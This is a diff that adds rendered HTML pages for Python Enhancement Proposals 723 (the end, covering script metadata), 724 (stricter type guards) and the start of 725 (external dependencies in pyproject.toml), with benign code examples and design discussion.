+            line[2:] if line.startswith('# ') else line[1:]
+            for line in matches[0].group('content').splitlines(keepends=True)
+        )
+        return tomllib.loads(content)
+    else:
+        return None
+
+
+

Often tools will edit dependencies like package managers or dependency update +automation in CI. The following is a crude example of modifying the content +using the tomlkit library.

+
import re
+
+import tomlkit
+
+REGEX = r'(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$'
+
+def add(script: str, dependency: str) -> str:
+    match = re.search(REGEX, script)
+    content = ''.join(
+        line[2:] if line.startswith('# ') else line[1:]
+        for line in match.group('content').splitlines(keepends=True)
+    )
+
+    config = tomlkit.parse(content)
+    config['dependencies'].append(dependency)
+    new_content = ''.join(
+        f'# {line}' if line.strip() else f'#{line}'
+        for line in tomlkit.dumps(config).splitlines(keepends=True)
+    )
+
+    start, end = match.span('content')
+    return script[:start] + new_content + script[end:]
+
+
+

Note that this example used a library that preserves TOML formatting. This is +not a requirement for editing by any means but rather is a “nice to have” +feature.

+

The following is an example of how to read a stream of arbitrary metadata +blocks.

+
import re
+from typing import Iterator
+
+REGEX = r'(?m)^# /// (?P<type>[a-zA-Z0-9-]+)$\s(?P<content>(^#(| .*)$\s)+)^# ///$'
+
+def stream(script: str) -> Iterator[tuple[str, str]]:
+    for match in re.finditer(REGEX, script):
+        yield match.group('type'), ''.join(
+            line[2:] if line.startswith('# ') else line[1:]
+            for line in match.group('content').splitlines(keepends=True)
+        )
+
+
+
+
+

Backwards Compatibility

+

At the time of writing, the # /// script block comment starter does not +appear in any Python files on GitHub. Therefore, there is little risk of existing +scripts being broken by this PEP.

+
+
+

Security Implications

+

If a script containing embedded metadata is run using a tool that automatically +installs dependencies, this could cause arbitrary code to be downloaded and +installed in the user’s environment.

+

The risk here is part of the functionality of the tool being used to run the +script, and as such should already be addressed by the tool itself. The only +additional risk introduced by this PEP is if an untrusted script with embedded +metadata is run, when a potentially malicious dependency or transitive +dependency might be installed.

+

This risk is addressed by the normal good practice of reviewing code +before running it. Additionally, tools may be able to provide +locking functionality to ameliorate this risk.

+
+
+

How to Teach This

+

To embed metadata in a script, define a comment block that starts with the +line # /// script and ends with the line # ///. Every line between +those two lines must be a comment and the full content is derived by removing +the first two characters.

+
# /// script
+# dependencies = [
+#   "requests<3",
+#   "rich",
+# ]
+# requires-python = ">=3.11"
+# ///
+
+
+

The allowed fields are described in the following table:

+ + + + + + + + + + + + + + + +
FieldDescriptionTool behavior
dependenciesA list of strings that specifies the runtime dependencies of the script. +Each entry must be a valid PEP 508 dependency.Tools will error if the specified dependencies cannot be provided.
requires-pythonA string that specifies the Python version(s) +with which the script is compatible. +The value of this field must be a valid +version specifier.Tools might error if no version of Python that satisfies +the constraint can be executed.
+

In addition, a [tool] table is allowed. Details of what is permitted are similar +to what is permitted in pyproject.toml, but precise information must be included +in the documentation of the relevant tool.

+

It is up to individual tools whether or not their behavior is altered based on +the embedded metadata. For example, every script runner may not be able to +provide an environment for specific Python versions as defined by the +requires-python field.

+

The tool table may be used by any tool, script runner +or otherwise, to configure behavior.

+
+
+

Recommendations

+

Tools that support managing different versions of Python should attempt to use +the highest available version of Python that is compatible with the script’s +requires-python metadata, if defined.

+
+
+

Tooling buy-in

+

The following is a list of tools that have expressed support for this PEP or +have committed to implementing support should it be accepted:

+
    +
  • Pantsbuild and Pex: expressed +support for any way to define dependencies and also features that this PEP +considers as valid use cases such as building packages from scripts and +embedding tool configuration
  • +
  • Mypy and +Ruff: strongly expressed support +for embedding tool configuration as it would solve existing pain points for +users
  • +
  • Hatch: (author of this PEP) +expressed support for all aspects of this PEP, and will be one of the first +tools to support running scripts with specifically configured Python versions
  • +
+
+
+

Rejected Ideas

+
+

Why not use a comment block resembling requirements.txt?

+

This PEP considers there to be different types of users for whom Python code +would live as single-file scripts:

+
    +
  • Non-programmers who are just using Python as a scripting language to achieve +a specific task. These users are unlikely to be familiar with concepts of +operating systems like shebang lines or the PATH environment variable. +Some examples:
      +
    • The average person, perhaps at a workplace, who wants to write a script to +automate something for efficiency or to reduce tedium
    • +
    • Someone doing data science or machine learning in industry or academia who +wants to write a script to analyze some data or for research purposes. +These users are special in that, although they have limited programming +knowledge, they learn from sources like StackOverflow and blogs that have a +programming bent and are increasingly likely to be part of communities that +share knowledge and code. Therefore, a non-trivial number of these users +will have some familiarity with things like Git(Hub), Jupyter, HuggingFace, +etc.
    • +
    +
  • +
  • Non-programmers who manage operating systems e.g. a sysadmin. These users are +able to set up PATH, for example, but are unlikely to be familiar with +Python concepts like virtual environments. These users often operate in +isolation and have limited need to gain exposure to tools intended for +sharing like Git.
  • +
  • Programmers who manage operating systems/infrastructure e.g. SREs. These +users are not very likely to be familiar with Python concepts like virtual +environments, but are likely to be familiar with Git and most often use it +to version control everything required to manage infrastructure like Python +scripts and Kubernetes config.
  • +
  • Programmers who write scripts primarily for themselves. These users over time +accumulate a great number of scripts in various languages that they use to +automate their workflow and often store them in a single directory, that is +potentially version controlled for persistence. Non-Windows users may set +up each Python script with a shebang line pointing to the desired Python +executable or script runner.
  • +
+

This PEP argues that the proposed TOML-based metadata format is the best for +each category of user and that the requirements-like block comment is only +approachable for those who have familiarity with requirements.txt, which +represents a small subset of users.

+
    +
  • For the average person automating a task or the data scientist, they are +already starting with zero context and are unlikely to be familiar with +TOML nor requirements.txt. These users will very likely rely on +snippets found online via a search engine or utilize AI in the form +of a chat bot or direct code completion software. The similarity with +dependency information stored in pyproject.toml will provide useful +search results relatively quickly, and while the pyproject.toml format +and the script metadata format are not the same, any resulting discrepancies +are unlikely to be difficult for the intended users to resolve.

    Additionally, these users are most susceptible to formatting quirks and +syntax errors. TOML is a well-defined format with existing online +validators that features assignment that is compatible with Python +expressions and has no strict indenting rules. The block comment format +on the other hand could be easily malformed by forgetting the colon, for +example, and debugging why it’s not working with a search engine would be +a difficult task for such a user.

    +
  • +
  • For the sysadmin types, they are equally unlikely as the previously described +users to be familiar with TOML or requirements.txt. For either format +they would have to read documentation. They would likely be more comfortable +with TOML since they are used to structured data formats and there would be +less perceived magic in their systems.

    Additionally, for maintenance of their systems /// script would be +much easier to search for from a shell than a block comment with potentially +numerous extensions over time.

    +
  • +
  • For the SRE types, they are likely to be familiar with TOML already from +other projects that they might have to work with like configuring the +GitLab Runner or Cloud Native Buildpacks.

    These users are responsible for the security of their systems and most likely +have security scanners set up to automatically open PRs to update versions +of dependencies. Such automated tools like Dependabot would have a much +easier time using existing TOML libraries than writing their own custom +parser for a block comment format.

    +
  • +
  • For the programmer types, they are more likely to be familiar with TOML +than they have ever seen a requirements.txt file, unless they are a +Python programmer who has had previous experience with writing applications. +In the case of experience with the requirements format, it necessarily means +that they are at least somewhat familiar with the ecosystem and therefore +it is safe to assume they know what TOML is.

    Another benefit of this PEP to these users is that their IDEs like Visual +Studio Code would be able to provide TOML syntax highlighting much more +easily than each writing custom logic for this feature.

    +
  • +
+

Additionally, since the original block comment alternative format (double +#) went against the recommendation of PEP 8 and as a result linters +and IDE auto-formatters that respected the recommendation would +fail by default, the final +proposal uses standard comments starting with a single # character without +any obvious start nor end sequence.

+

The concept of regular comments that do not appear to be intended for machines +(i.e. encoding declarations) affecting behavior would not be customary to +users of Python and goes directly against the “explicit is better than +implicit” foundational principle.

+

Users typing what to them looks like prose could alter runtime behavior. This +PEP takes the view that the possibility of that happening, even when a tool +has been set up as such (maybe by a sysadmin), is unfriendly to users.

+

Finally, and critically, the alternatives to this PEP like PEP 722 do not +satisfy the use cases enumerated herein, such as setting the supported Python +versions, the eventual building of scripts into packages, and the ability to +have machines edit metadata on behalf of users. It is very likely that the +requests for such features persist and conceivable that another PEP in the +future would allow for the embedding of such metadata. At that point there +would be multiple ways to achieve the same thing which goes against our +foundational principle of “there should be one - and preferably only one - +obvious way to do it”.

+
+
+

Why not use a multi-line string?

+

A previous version of this PEP proposed that the metadata be stored as follows:

+
__pyproject__ = """
+...
+"""
+
+
+

The most significant problem with this proposal is that the embedded TOML would +be limited in the following ways:

+
    +
  • It would not be possible to use multi-line double-quoted strings in the TOML +as that would conflict with the Python string containing the document. Many +TOML writers do not preserve style and may potentially produce output that +would be malformed.
  • +
  • The way in which character escaping works in Python strings is not quite the +way it works in TOML strings. It would be possible to preserve a one-to-one +character mapping by enforcing raw strings, but this r prefix requirement +may be potentially confusing to users.
  • +
+
+
+

Why not reuse core metadata fields?

+

A previous version of this PEP proposed to reuse the existing +metadata standard that is used to describe projects.

+

There are two significant problems with this proposal:

+ +
+
+

Why not limit to specific metadata fields?

+

By limiting the metadata to just dependencies, we would prevent the known +use case of tools that support managing Python installations, which would +allows users to target specific versions of Python for new syntax or standard +library functionality.

+
+
+

Why not limit tool configuration?

+

By not allowing the [tool] table, we would prevent known functionality +that would benefit users. For example:

+
    +
  • A script runner may support injecting of dependency resolution data for an +embedded lock file (this is what Go’s gorun can do).
  • +
  • A script runner may support configuration instructing to run scripts in +containers for situations in which there is no cross-platform support for a +dependency or if the setup is too complex for the average user like when +requiring Nvidia drivers. Situations like this would allow users to proceed +with what they want to do whereas otherwise they may stop at that point +altogether.
  • +
  • Tools may wish to experiment with features to ease development burden for +users such as the building of single-file scripts into packages. We received +feedback stating that there are +already tools that exist in the wild that build wheels and source +distributions from single files.

    The author of the Rust RFC for embedding metadata +mentioned to us that they are +actively looking into that as well based on user feedback saying that there +is unnecessary friction with managing small projects.

    +

    There has been a commitment to +support this by at least one major build system.

    +
  • +
+
+
+

Why not limit tool behavior?

+

A previous version of this PEP proposed that non-script running tools SHOULD +NOT modify their behavior when the script is not the sole input to the tool. +For example, if a linter is invoked with the path to a directory, it SHOULD +behave the same as if zero files had embedded metadata.

+

This was done as a precaution to avoid tool behavior confusion and generating +various feature requests for tools to support this PEP. However, during +discussion we received feedback +from maintainers of tools that this would be undesirable and potentially +confusing to users. Additionally, this may allow for a universally easier +way to configure tools in certain circumstances and solve existing issues.

+
+
+

Why not just set up a Python project with a pyproject.toml?

+

Again, a key issue here is that the target audience for this proposal is people +writing scripts which aren’t intended for distribution. Sometimes scripts will +be “shared”, but this is far more informal than “distribution” - it typically +involves sending a script via an email with some written instructions on how to +run it, or passing someone a link to a GitHub gist.

+

Expecting such users to learn the complexities of Python packaging is a +significant step up in complexity, and would almost certainly give the +impression that “Python is too hard for scripts”.

+

In addition, if the expectation here is that the pyproject.toml will +somehow be designed for running scripts in place, that’s a new feature of the +standard that doesn’t currently exist. At a minimum, this isn’t a reasonable +suggestion until the current discussion on Discourse about using pyproject.toml for projects that +won’t be distributed as wheels is resolved. And even then, it doesn’t address +the “sending someone a script in a gist or email” use case.

+
+
+

Why not infer the requirements from import statements?

+

The idea would be to automatically recognize import statements in the source +file and turn them into a list of requirements.

+

However, this is infeasible for several reasons. First, the points above about +the necessity to keep the syntax easily parsable, for all Python versions, also +by tools written in other languages, apply equally here.

+

Second, PyPI and other package repositories conforming to the Simple Repository +API do not provide a mechanism to resolve package names from the module names +that are imported (see also this related discussion).

+

Third, even if repositories did offer this information, the same import name may +correspond to several packages on PyPI. One might object that disambiguating +which package is wanted would only be needed if there are several projects +providing the same import name. However, this would make it easy for anyone to +unintentionally or malevolently break working scripts, by uploading a package to +PyPI providing an import name that is the same as an existing project. The +alternative where, among the candidates, the first package to have been +registered on the index is chosen, would be confusing in case a popular package +is developed with the same import name as an existing obscure package, and even +harmful if the existing package is malware intentionally uploaded with a +sufficiently generic import name that has a high probability of being reused.

+

A related idea would be to attach the requirements as comments to the import +statements instead of gathering them in a block, with a syntax such as:

+
import numpy as np # requires: numpy
+import rich # requires: rich
+
+
+

This still suffers from parsing difficulties. Also, where to place the comment +in the case of multiline imports is ambiguous and may look ugly:

+
from PyQt5.QtWidgets import (
+    QCheckBox, QComboBox, QDialog, QDialogButtonBox,
+    QGridLayout, QLabel, QSpinBox, QTextEdit
+) # requires: PyQt5
+
+
+

Furthermore, this syntax cannot behave as might be intuitively expected +in all situations. Consider:

+
import platform
+if platform.system() == "Windows":
+    import pywin32 # requires: pywin32
+
+
+

Here, the user’s intent is that the package is only required on Windows, but +this cannot be understood by the script runner (the correct way to write +it would be requires: pywin32 ; sys_platform == 'win32').

+

(Thanks to Jean Abou-Samra for the clear discussion of this point)

+
+
+

Why not use a requirements file for dependencies?

+

Putting your requirements in a requirements file, doesn’t require a PEP. You +can do that right now, and in fact it’s quite likely that many adhoc solutions +do this. However, without a standard, there’s no way of knowing how to locate a +script’s dependency data. And furthermore, the requirements file format is +pip-specific, so tools relying on it are depending on a pip implementation +detail.

+

So in order to make a standard, two things would be required:

+
    +
  1. A standardised replacement for the requirements file format.
  2. +
  3. A standard for how to locate the requirements file for a given script.
  4. +
+

The first item is a significant undertaking. It has been discussed on a number +of occasions, but so far no-one has attempted to actually do it. The most +likely approach would be for standards to be developed for individual use cases +currently addressed with requirements files. One option here would be for this +PEP to simply define a new file format which is simply a text file containing +PEP 508 requirements, one per line. That would just leave the question of +how to locate that file.

+

The “obvious” solution here would be to do something like name the file the +same as the script, but with a .reqs extension (or something similar). +However, this still requires two files, where currently only a single file is +needed, and as such, does not match the “better batch file” model (shell +scripts and batch files are typically self-contained). It requires the +developer to remember to keep the two files together, and this may not always +be possible. For example, system administration policies may require that all +files in a certain directory are executable (the Linux filesystem standards +require this of /usr/bin, for example). And some methods of sharing a +script (for example, publishing it on a text file sharing service like Github’s +gist, or a corporate intranet) may not allow for deriving the location of an +associated requirements file from the script’s location (tools like pipx +support running a script directly from a URL, so “download and unpack a zip of +the script and its dependencies” may not be an appropriate requirement).

+

Essentially, though, the issue here is that there is an explicitly stated +requirement that the format supports storing dependency data in the script +file itself. Solutions that don’t do that are simply ignoring that +requirement.

+
+
+

Why not use (possibly restricted) Python syntax?

+

This would typically involve storing metadata as multiple special variables, +such as the following.

+
__requires_python__ = ">=3.11"
+__dependencies__ = [
+    "requests",
+    "click",
+]
+
+
+

The most significant problem with this proposal is that it requires all +consumers of the dependency data to implement a Python parser. Even if the +syntax is restricted, the rest of the script will use the full Python syntax, +and trying to define a syntax which can be successfully parsed in isolation +from the surrounding code is likely to be extremely difficult and error-prone.

+

Furthermore, Python’s syntax changes in every release. If extracting dependency +data needs a Python parser, the parser will need to know which version of +Python the script is written for, and the overhead for a generic tool of having +a parser that can handle multiple versions of Python is unsustainable.

+

With this approach there is the potential to clutter scripts with many +variables as new extensions get added. Additionally, intuiting which metadata +fields correspond to which variable names would cause confusion for users.

+

It is worth noting, though, that the pip-run utility does implement (an +extended form of) this approach. Further discussion of +the pip-run design is available on the project’s issue tracker.

+
+
+

What about local dependencies?

+

These can be handled without needing special metadata and tooling, simply by +adding the location of the dependencies to sys.path. This PEP simply isn’t +needed for this case. If, on the other hand, the “local dependencies” are +actual distributions which are published locally, they can be specified as +usual with a PEP 508 requirement, and the local package index specified when +running a tool by using the tool’s UI for that.

+
+
+
+

Open Issues

+

None at this point.

+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0723.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0724/index.html b/pep-0724/index.html new file mode 100644 index 00000000000..eef5cd46121 --- /dev/null +++ b/pep-0724/index.html @@ -0,0 +1,463 @@ + + + + + + + + PEP 724 – Stricter Type Guards | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 724 – Stricter Type Guards

+
+
Author:
+
Rich Chiodo <rchiodo at microsoft.com>, +Eric Traut <erictr at microsoft.com>, +Erik De Bonte <erikd at microsoft.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
28-Jul-2023
+
Python-Version:
+
3.13
+
Post-History:
+
30-Dec-2021, +19-Sep-2023
+
+
+
+
Table of Contents +
+
+

Status

+

This PEP is withdrawn. The Typing Council was unable to reach consensus on +this proposal, and the authors decided to withdraw it.

+
+
+

Abstract

+

PEP 647 introduced the concept of a user-defined type guard function which +returns True if the type of the expression passed to its first parameter +matches its return TypeGuard type. For example, a function that has a +return type of TypeGuard[str] is assumed to return True if and only if +the type of the expression passed to its first input parameter is a str. +This allows type checkers to narrow types when a user-defined type guard +function returns True.

+

This PEP refines the TypeGuard mechanism introduced in PEP 647. It +allows type checkers to narrow types when a user-defined type guard function +returns False. It also allows type checkers to apply additional (more +precise) type narrowing under certain circumstances when the type guard +function returns True.

+
+
+

Motivation

+

User-defined type guard functions enable a type checker to narrow the type of +an expression when it is passed as an argument to the type guard function. The +TypeGuard mechanism introduced in PEP 647 is flexible, but this +flexibility imposes some limitations that developers have found inconvenient +for some uses.

+

Limitation 1: Type checkers are not allowed to narrow a type in the case where +the type guard function returns False. This means the type is not narrowed +in the negative (“else”) clause.

+

Limitation 2: Type checkers must use the TypeGuard return type if the type +guard function returns True regardless of whether additional narrowing can +be applied based on knowledge of the pre-narrowed type.

+

The following code sample demonstrates both of these limitations.

+
def is_iterable(val: object) -> TypeGuard[Iterable[Any]]:
+    return isinstance(val, Iterable)
+
+def func(val: int | list[int]):
+    if is_iterable(val):
+        # The type is narrowed to 'Iterable[Any]' as dictated by
+        # the TypeGuard return type
+        reveal_type(val)  # Iterable[Any]
+    else:
+        # The type is not narrowed in the "False" case
+        reveal_type(val)  # int | list[int]
+
+    # If "isinstance" is used in place of the user-defined type guard
+    # function, the results differ because type checkers apply additional
+    # logic for "isinstance"
+
+    if isinstance(val, Iterable):
+        # Type is narrowed to "list[int]" because this is
+        # a narrower (more precise) type than "Iterable[Any]"
+        reveal_type(val)  # list[int]
+    else:
+        # Type is narrowed to "int" because the logic eliminates
+        # "list[int]" from the original union
+        reveal_type(val)  # int
+
+
+

PEP 647 imposed these limitations so it could support use cases where the +return TypeGuard type was not a subtype of the input type. Refer to +PEP 647 for examples.

+
+
+

Rationale

+

There are a number of issues where a stricter TypeGuard would have +been a solution:

+ +
+
+

Specification

+

The use of a user-defined type guard function involves five types:

+
    +
  • I = TypeGuard input type
  • +
  • R = TypeGuard return type
  • +
  • A = Type of argument passed to type guard function (pre-narrowed)
  • +
  • NP = Narrowed type (positive)
  • +
  • NN = Narrowed type (negative)
  • +
+
def guard(x: I) -> TypeGuard[R]: ...
+
+def func1(val: A):
+    if guard(val):
+        reveal_type(val)  # NP
+    else:
+        reveal_type(val)  # NN
+
+
+

This PEP proposes some modifications to PEP 647 to address the limitations +discussed above. These limitations are safe to eliminate only when a specific +condition is met. In particular, when the output type R of a user-defined +type guard function is consistent [1] with the type of its first +input parameter (I), type checkers should apply stricter type guard +semantics.

+
+
# Stricter type guard semantics are used in this case because
+# "Kangaroo | Koala" is consistent with "Animal"
+def is_marsupial(val: Animal) -> TypeGuard[Kangaroo | Koala]:
+    return isinstance(val, Kangaroo | Koala)
+
+# Stricter type guard semantics are not used in this case because
+# "list[T]"" is not consistent with "list[T | None]"
+def has_no_nones(val: list[T | None]) -> TypeGuard[list[T]]:
+    return None not in val
+
+
+
+

When stricter type guard semantics are applied, the application of a +user-defined type guard function changes in two ways.

+
    +
  • Type narrowing is applied in the negative (“else”) case.
  • +
+
def is_str(val: str | int) -> TypeGuard[str]:
+    return isinstance(val, str)
+
+def func(val: str | int):
+    if not is_str(val):
+        reveal_type(val)  # int
+
+
+
    +
  • Additional type narrowing is applied in the positive “if” case if applicable.
  • +
+
def is_cardinal_direction(val: str) -> TypeGuard[Literal["N", "S", "E", "W"]]:
+    return val in ("N", "S", "E", "W")
+
+def func(direction: Literal["NW", "E"]):
+    if is_cardinal_direction(direction):
+        reveal_type(direction)  # "Literal[E]"
+    else:
+        reveal_type(direction)  # "Literal[NW]"
+
+
+

The type-theoretic rules for type narrowing are specified in the following +table.

+ + + + + + + + + + + + + + + + + + + + + +
Non-strict type guardStrict type guard
Applies whenR not consistent with IR consistent with I
NP is ..RAR
NN is ..AA∧¬R
+

In practice, the theoretic types for strict type guards cannot be expressed +precisely in the Python type system. Type checkers should fall back on +practical approximations of these types. As a rule of thumb, a type checker +should use the same type narrowing logic – and get results that are consistent +with – its handling of “isinstance”. This guidance allows for changes and +improvements if the type system is extended in the future.

+
+
+

Additional Examples

+

Any is consistent [1] with any other type, which means +stricter semantics can be applied.

+
 # Stricter type guard semantics are used in this case because
+ # "str" is consistent with "Any"
+def is_str(x: Any) -> TypeGuard[str]:
+    return isinstance(x, str)
+
+def test(x: float | str):
+    if is_str(x):
+        reveal_type(x)  # str
+    else:
+        reveal_type(x)  # float
+
+
+
+
+

Backwards Compatibility

+

This PEP proposes to change the existing behavior of TypeGuard. This has no +effect at runtime, but it does change the types evaluated by a type checker.

+
def is_int(val: int | str) -> TypeGuard[int]:
+    return isinstance(val, int)
+
+def func(val: int | str):
+    if is_int(val):
+        reveal_type(val)  # "int"
+    else:
+        reveal_type(val)  # Previously "int | str", now "str"
+
+
+

This behavioral change results in different types evaluated by a type checker. +It could therefore produce new (or mask existing) type errors.

+

Type checkers often improve narrowing logic or fix existing bugs in such logic, +so users of static typing will be used to this type of behavioral change.

+

We also hypothesize that it is unlikely that existing typed Python code relies +on the current behavior of TypeGuard. To validate our hypothesis, we +implemented the proposed change in pyright and ran this modified version on +roughly 25 typed code bases using mypy primer to see if there were any +differences in the output. As predicted, the behavioral change had minimal +impact. The only noteworthy change was that some # type: ignore comments +were no longer necessary, indicating that these code bases were already working +around the existing limitations of TypeGuard.

+
+

Breaking change

+

It is possible for a user-defined type guard function to rely on the old +behavior. Such type guard functions could break with the new behavior.

+
def is_positive_int(val: int | str) -> TypeGuard[int]:
+    return isinstance(val, int) and val > 0
+
+def func(val: int | str):
+    if is_positive_int(val):
+        reveal_type(val)  # "int"
+    else:
+        # With the older behavior, the type of "val" is evaluated as
+        # "int | str"; with the new behavior, the type is narrowed to
+        # "str", which is perhaps not what was intended.
+        reveal_type(val)
+
+
+

We think it is unlikely that such user-defined type guards exist in real-world +code. The mypy primer results didn’t uncover any such cases.

+
+
+
+

How to Teach This

+

Users unfamiliar with TypeGuard are likely to expect the behavior outlined +in this PEP, therefore making TypeGuard easier to teach and explain.

+
+
+

Reference Implementation

+

A reference implementation of this idea exists in pyright.

+

To enable the modified behavior, the configuration flag +enableExperimentalFeatures must be set to true. This can be done on a +per-file basis by adding a comment:

+
# pyright: enableExperimentalFeatures=true
+
+
+
+
+

Rejected Ideas

+
+

StrictTypeGuard

+

A new StrictTypeGuard construct was proposed. This alternative form would +be similar to a TypeGuard except it would apply stricter type guard +semantics. It would also enforce that the return type was consistent +[1] with the input type. See this thread for details: +StrictTypeGuard proposal

+

This idea was rejected because it is unnecessary in most cases and added +unnecessary complexity. It would require the introduction of a new special +form, and developers would need to be educated about the subtle difference +between the two forms.

+
+
+

TypeGuard with a second output type

+

Another idea was proposed where TypeGuard could support a second optional +type argument that indicates the type that should be used for narrowing in the +negative (“else”) case.

+
def is_int(val: int | str) -> TypeGuard[int, str]:
+    return isinstance(val, int)
+
+
+

This idea was proposed here.

+

It was rejected because it was considered too complicated and addressed only +one of the two main limitations of TypeGuard. Refer to this thread for +the full discussion.

+
+
+
+

Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0724.rst

+

Last modified: 2024-08-20 10:29:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0725/index.html b/pep-0725/index.html new file mode 100644 index 00000000000..7ade105017c --- /dev/null +++ b/pep-0725/index.html @@ -0,0 +1,830 @@ + + + + + + + + PEP 725 – Specifying external dependencies in pyproject.toml | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 725 – Specifying external dependencies in pyproject.toml

+
+
Author:
+
Pradyun Gedam <pradyunsg at gmail.com>, +Ralf Gommers <ralf.gommers at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
17-Aug-2023
+
Post-History:
+
18-Aug-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies how to write a project’s external, or non-PyPI, build and +runtime dependencies in a pyproject.toml file for packaging-related tools +to consume.

+

This PEP proposes to add an [external] table to pyproject.toml with +three keys: “build-requires”, “host-requires” and “dependencies”. These +are for specifying three types of dependencies:

+
    +
  1. build-requires, build tools to run on the build machine
  2. +
  3. host-requires, build dependencies needed for host machine but also needed at build time.
  4. +
  5. dependencies, needed at runtime on the host machine but not needed at build time.
  6. +
+

Cross compilation is taken into account by distinguishing build and host dependencies. +Optional build-time and runtime dependencies are supported too, in a manner analogies +to how that is supported in the [project] table.

+
+
+

Motivation

+

Python packages may have dependencies on build tools, libraries, command-line +tools, or other software that is not present on PyPI. Currently there is no way +to express those dependencies in standardized metadata +[1], [2]. Key motivators for +this PEP are to:

+
    +
  • Enable tools to automatically map external dependencies to packages in other +packaging repositories,
  • +
  • Make it possible to include needed dependencies in error messages emitting by +Python package installers and build frontends,
  • +
  • Provide a canonical place for package authors to record this dependency +information.
  • +
+

Packaging ecosystems like Linux distros, Conda, Homebrew, Spack, and Nix need +full sets of dependencies for Python packages, and have tools like pyp2spec +(Fedora), Grayskull (Conda), and dh_python (Debian) which attempt to +automatically generate dependency metadata for their own package managers from the metadata in +upstream Python packages. External dependencies are currently handled manually, +because there is no metadata for this in pyproject.toml or any other +standard location. Enabling automating this conversion is a key benefit of +this PEP, making packaging Python packages for distros easier and more reliable. In addition, the +authors envision other types of tools making use of this information, e.g., +dependency analysis tools like Repology, Dependabot and libraries.io. +Software bill of materials (SBOM) generation tools may also be able to use this +information, e.g. for flagging that external dependencies listed in +pyproject.toml but not contained in wheel metadata are likely vendored +within the wheel.

+

Packages with external dependencies are typically hard to build from source, +and error messages from build failures tend to be hard to decipher for end +users. Missing external dependencies on the end user’s system are the most +likely cause of build failures. If installers can show the required external +dependencies as part of their error message, this may save users a lot of time.

+

At the moment, information on external dependencies is only captured in +installation documentation of individual packages. It is hard to maintain for +package authors and tends to go out of date. It’s also hard for users and +distro packagers to find it. Having a canonical place to record this dependency +information will improve this situation.

+

This PEP is not trying to specify how the external dependencies should be used, +nor a mechanism to implement a name mapping from names of individual packages +that are canonical for Python projects published on PyPI to those of other +packaging ecosystems. Those topics should be addressed in separate PEPs.

+
+
+

Rationale

+
+

Types of external dependencies

+

Multiple types of external dependencies can be distinguished:

+
    +
  • Concrete packages that can be identified by name and have a canonical +location in another language-specific package repository. E.g., Rust +packages on crates.io, R packages on +CRAN, JavaScript packages on the +npm registry.
  • +
  • Concrete packages that can be identified by name but do not have a clear +canonical location. This is typically the case for libraries and tools +written in C, C++, Fortran, CUDA and other low-level languages. E.g., +Boost, OpenSSL, Protobuf, Intel MKL, GCC.
  • +
  • “Virtual” packages, which are names for concepts, types of tools or +interfaces. These typically have multiple implementations, which are +concrete packages. E.g., a C++ compiler, BLAS, LAPACK, OpenMP, MPI.
  • +
+

Concrete packages are straightforward to understand, and are a concept present +in virtually every package management system. Virtual packages are a concept +also present in a number of packaging systems – but not always, and the +details of their implementation varies.

+
+
+

Cross compilation

+

Cross compilation is not yet (as of August 2023) well-supported by stdlib +modules and pyproject.toml metadata. It is however important when +translating external dependencies to those of other packaging systems (with +tools like pyp2spec). Introducing support for cross compilation immediately +in this PEP is much easier than extending [external] in the future, hence +the authors choose to include this now.

+
+

Terminology

+

This PEP uses the following terminology:

+
    +
  • build machine: the machine on which the package build process is being +executed
  • +
  • host machine: the machine on which the produced artifact will be installed +and run
  • +
  • build dependency: dependency for building the package that needs to be +present at build time and itself was built for the build machine’s OS and +architecture
  • +
  • host dependency: dependency for building the package that needs to be +present at build time and itself was built for the host machine’s OS and +architecture
  • +
+

Note that this terminology is not consistent across build and packaging tools, +so care must be taken when comparing build/host dependencies in +pyproject.toml to dependencies from other package managers.

+

Note that “target machine” or “target dependency” is not used in this PEP. That +is typically only relevant for cross-compiling compilers or other such advanced +scenarios [3], [4] - this is out of scope for +this PEP.

+

Finally, note that while “dependency” is the term most widely used for packages +needed at build time, the existing key in pyproject.toml for PyPI +build-time dependencies is build-requires. Hence this PEP uses the keys +build-requires and host-requires under [external] for consistency.

+
+
+

Build and host dependencies

+

Clear separation of metadata associated with the definition of build and target +platforms, rather than assuming that build and target platform will always be +the same, is important [5].

+

Build dependencies are typically run during the build process - they may be +compilers, code generators, or other such tools. In case the use of a build +dependency implies a runtime dependency, that runtime dependency does not have +to be declared explicitly. For example, when compiling Fortran code with +gfortran into a Python extension module, the package likely incurs a +dependency on the libgfortran runtime library. The rationale for not +explicitly listing such runtime dependencies is two-fold: (1) it may depend on +compiler/linker flags or details of the build environment whether the +dependency is present, and (2) these runtime dependencies can be detected and +handled automatically by tools like auditwheel.

+

Host dependencies are typically not run during the build process, but only used +for linking against. This is not a rule though – it may be possible or +necessary to run a host dependency under an emulator, or through a custom tool +like crossenv. When host dependencies imply a runtime dependency, that runtime +dependency also does not have to be declared, just like for build dependencies.

+

When host dependencies are declared and a tool is not cross-compilation aware +and has to do something with external dependencies, the tool MAY merge the +host-requires list into build-requires. This may for example happen if +an installer like pip starts reporting external dependencies as a likely +cause of a build failure when a package fails to build from an sdist.

+
+
+
+

Specifying external dependencies

+
+

Concrete package specification through PURL

+

The two types of concrete packages are supported by PURL (Package URL), which +implements a scheme for identifying packages that is meant to be portable +across packaging ecosystems. Its design is:

+
scheme:type/namespace/name@version?qualifiers#subpath
+
+
